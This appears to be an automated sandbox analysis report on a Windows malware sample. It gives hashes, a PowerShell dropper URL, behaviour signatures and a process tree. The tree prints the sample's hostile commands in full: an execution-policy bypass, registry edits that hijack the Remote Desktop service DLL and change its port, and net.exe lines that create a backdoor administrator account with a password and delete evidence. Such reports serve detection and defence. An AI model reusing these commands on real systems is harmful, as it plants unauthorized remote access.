Analysis
-
max time kernel
68s -
max time network
114s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25/03/2021, 18:32
Static task
static1
Behavioral task
behavioral1
Sample
d063fbcc3d30dfb51efdae96e4232813.exe
Resource
win7v20201028
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
d063fbcc3d30dfb51efdae96e4232813.exe
Resource
win10v20201028
0 signatures
0 seconds
General
-
Target
d063fbcc3d30dfb51efdae96e4232813.exe
-
Size
6.0MB
-
MD5
d063fbcc3d30dfb51efdae96e4232813
-
SHA1
d7934d41583758a2b713a8278d36e5e27c178a37
-
SHA256
5090fa74f83368086c1d197dcd28e51f8b36cd5d2c18e9a964d925a445ea0066
-
SHA512
bacb8305dd9ba9f0cbce4d56d67ac50ae825f52007d091e16fec111c2af4758294710129adbd0786e5cdfca2cd289e888e4b1e7b696957f0a87181d23011248a
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 17 1336 powershell.exe 19 1336 powershell.exe 20 1336 powershell.exe 21 1336 powershell.exe 23 1336 powershell.exe 25 1336 powershell.exe 27 1336 powershell.exe 29 1336 powershell.exe 31 1336 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000700000001ab74-75.dat upx behavioral2/files/0x000700000001ab7a-76.dat upx -
Loads dropped DLL 2 IoCs
pid Process 2392 Process not Found 2392 Process not Found -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE863.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE804.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dfh54ohe.sb1.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE873.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE884.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE895.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fkevyi5w.4a5.ps1 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1376 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2820 reg.exe -
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 3212 powershell.exe 3212 powershell.exe 3212 powershell.exe 2812 powershell.exe 2812 powershell.exe 2812 powershell.exe 2132 powershell.exe 2132 powershell.exe 2132 powershell.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 1336 powershell.exe 1336 powershell.exe 1336 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 624 Process not Found 624 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 3212 powershell.exe Token: SeIncreaseQuotaPrivilege 3212 powershell.exe Token: SeSecurityPrivilege 3212 powershell.exe Token: SeTakeOwnershipPrivilege 3212 powershell.exe Token: SeLoadDriverPrivilege 3212 powershell.exe Token: SeSystemProfilePrivilege 3212 powershell.exe Token: SeSystemtimePrivilege 3212 powershell.exe Token: SeProfSingleProcessPrivilege 3212 powershell.exe Token: SeIncBasePriorityPrivilege 3212 powershell.exe Token: SeCreatePagefilePrivilege 3212 powershell.exe Token: SeBackupPrivilege 3212 powershell.exe Token: SeRestorePrivilege 3212 powershell.exe Token: SeShutdownPrivilege 3212 powershell.exe Token: SeDebugPrivilege 3212 powershell.exe Token: SeSystemEnvironmentPrivilege 3212 powershell.exe Token: SeRemoteShutdownPrivilege 3212 powershell.exe Token: SeUndockPrivilege 3212 powershell.exe Token: SeManageVolumePrivilege 3212 powershell.exe Token: 33 3212 powershell.exe Token: 34 3212 powershell.exe Token: 35 3212 powershell.exe Token: 36 3212 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeIncreaseQuotaPrivilege 2812 powershell.exe Token: SeSecurityPrivilege 2812 powershell.exe Token: SeTakeOwnershipPrivilege 2812 powershell.exe Token: SeLoadDriverPrivilege 2812 powershell.exe Token: SeSystemProfilePrivilege 2812 powershell.exe Token: SeSystemtimePrivilege 2812 powershell.exe Token: SeProfSingleProcessPrivilege 2812 powershell.exe Token: SeIncBasePriorityPrivilege 2812 powershell.exe Token: SeCreatePagefilePrivilege 2812 powershell.exe Token: SeBackupPrivilege 2812 powershell.exe Token: SeRestorePrivilege 2812 powershell.exe Token: SeShutdownPrivilege 2812 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeSystemEnvironmentPrivilege 2812 powershell.exe Token: SeRemoteShutdownPrivilege 2812 powershell.exe Token: SeUndockPrivilege 2812 powershell.exe Token: SeManageVolumePrivilege 2812 powershell.exe Token: 33 2812 powershell.exe Token: 34 2812 powershell.exe Token: 35 2812 powershell.exe Token: 36 2812 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeIncreaseQuotaPrivilege 2132 powershell.exe Token: SeSecurityPrivilege 2132 powershell.exe Token: SeTakeOwnershipPrivilege 2132 powershell.exe Token: SeLoadDriverPrivilege 2132 powershell.exe Token: SeSystemProfilePrivilege 2132 powershell.exe Token: SeSystemtimePrivilege 2132 powershell.exe Token: SeProfSingleProcessPrivilege 2132 powershell.exe Token: SeIncBasePriorityPrivilege 2132 powershell.exe Token: SeCreatePagefilePrivilege 2132 powershell.exe Token: SeBackupPrivilege 2132 powershell.exe Token: SeRestorePrivilege 2132 powershell.exe Token: SeShutdownPrivilege 2132 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeSystemEnvironmentPrivilege 2132 powershell.exe Token: SeRemoteShutdownPrivilege 2132 powershell.exe Token: SeUndockPrivilege 2132 powershell.exe Token: SeManageVolumePrivilege 2132 powershell.exe Token: 33 2132 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 812 wrote to memory of 2916 812 d063fbcc3d30dfb51efdae96e4232813.exe 75 PID 812 wrote to memory of 2916 812 d063fbcc3d30dfb51efdae96e4232813.exe 75 PID 2916 wrote to memory of 2272 2916 powershell.exe 79 PID 2916 wrote to memory of 2272 2916 powershell.exe 79 PID 2272 wrote to memory of 3488 2272 csc.exe 80 PID 2272 wrote to memory of 3488 2272 csc.exe 80 PID 2916 wrote to memory of 912 2916 powershell.exe 82 PID 2916 wrote to memory of 912 2916 powershell.exe 82 PID 912 wrote to memory of 3540 912 csc.exe 83 PID 912 wrote to memory of 3540 912 csc.exe 83 PID 2916 wrote to memory of 3212 2916 powershell.exe 84 PID 2916 wrote to memory of 3212 2916 powershell.exe 84 PID 2916 wrote to memory of 2812 2916 powershell.exe 87 PID 2916 wrote to memory of 2812 2916 powershell.exe 87 PID 2916 wrote to memory of 2132 2916 powershell.exe 89 PID 2916 wrote to memory of 2132 2916 powershell.exe 89 PID 2916 wrote to memory of 2288 2916 powershell.exe 91 PID 2916 wrote to memory of 2288 2916 powershell.exe 91 PID 2916 wrote to memory of 2820 2916 powershell.exe 92 PID 2916 wrote to memory of 2820 2916 powershell.exe 92 PID 2916 wrote to memory of 3392 2916 powershell.exe 93 PID 2916 wrote to memory of 3392 2916 powershell.exe 93 PID 2916 wrote to memory of 3840 2916 powershell.exe 94 PID 2916 wrote to memory of 3840 2916 powershell.exe 94 PID 3840 wrote to memory of 3836 3840 net.exe 95 PID 3840 wrote to memory of 3836 3840 net.exe 95 PID 2916 wrote to memory of 2104 2916 powershell.exe 96 PID 2916 wrote to memory of 2104 2916 powershell.exe 96 PID 2104 wrote to memory of 3824 2104 cmd.exe 97 PID 2104 wrote to memory of 3824 2104 cmd.exe 97 PID 3824 wrote to memory of 940 3824 cmd.exe 98 PID 3824 wrote to memory of 940 3824 cmd.exe 98 PID 940 wrote to memory of 1148 940 net.exe 99 PID 940 wrote to memory of 1148 940 net.exe 99 PID 2916 wrote to memory of 3768 2916 powershell.exe 100 PID 2916 wrote to memory of 3768 2916 powershell.exe 100 PID 3768 wrote to memory of 2356 3768 cmd.exe 101 PID 3768 wrote to memory of 2356 3768 cmd.exe 101 PID 2356 wrote to memory of 1380 2356 cmd.exe 102 PID 2356 wrote to memory of 1380 2356 cmd.exe 102 PID 1380 wrote to memory of 4064 1380 net.exe 103 PID 1380 wrote to memory of 4064 1380 net.exe 103 PID 3808 wrote to memory of 196 3808 cmd.exe 107 PID 3808 wrote to memory of 196 3808 cmd.exe 107 PID 196 wrote to memory of 640 196 net.exe 108 PID 196 wrote to memory of 640 196 net.exe 108 PID 1552 wrote to memory of 1516 1552 cmd.exe 111 PID 1552 wrote to memory of 1516 1552 cmd.exe 111 PID 1516 wrote to memory of 1688 1516 net.exe 112 PID 1516 wrote to memory of 1688 1516 net.exe 112 PID 3832 wrote to memory of 3580 3832 cmd.exe 115 PID 3832 wrote to memory of 3580 3832 cmd.exe 115 PID 3580 wrote to memory of 940 3580 net.exe 116 PID 3580 wrote to memory of 940 3580 net.exe 116 PID 1324 wrote to memory of 1152 1324 cmd.exe 119 PID 1324 wrote to memory of 1152 1324 cmd.exe 119 PID 1152 wrote to memory of 2176 1152 net.exe 120 PID 1152 wrote to memory of 2176 1152 net.exe 120 PID 2328 wrote to memory of 2288 2328 cmd.exe 123 PID 2328 wrote to memory of 2288 2328 cmd.exe 123 PID 2288 wrote to memory of 2072 2288 net.exe 124 PID 2288 wrote to memory of 2072 2288 net.exe 124 PID 3760 wrote to memory of 1336 3760 cmd.exe 127 PID 3760 wrote to memory of 1336 3760 cmd.exe 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\d063fbcc3d30dfb51efdae96e4232813.exe"C:\Users\Admin\AppData\Local\Temp\d063fbcc3d30dfb51efdae96e4232813.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fztlkpzc\fztlkpzc.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES818A.tmp" "c:\Users\Admin\AppData\Local\Temp\fztlkpzc\CSC500BE2C12FAB4ED68236FC9BB13C3A86.TMP"4⤵PID:3488
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xraafww\2xraafww.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D5.tmp" "c:\Users\Admin\AppData\Local\Temp\2xraafww\CSCA04569138B8F42FE8092B91EB490B3E6.TMP"4⤵PID:3540
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2288
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2820
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3392
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3836
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1148
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:4064
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3760
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\d063fbcc3d30dfb51efdae96e4232813.exe2⤵PID:3876
-
C:\Windows\system32\timeout.exetimeout -n t3⤵
- Delays execution with timeout.exe
PID:1376
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:640
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc R1ViY0er /add1⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\net.exenet.exe user wgautilacc R1ViY0er /add2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc R1ViY0er /add3⤵PID:1688
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:940
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc R1ViY0er1⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\system32\net.exenet.exe user wgautilacc R1ViY0er2⤵PID:1336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc R1ViY0er3⤵PID:912
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:940
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:2308
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1432
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:3392
-
-
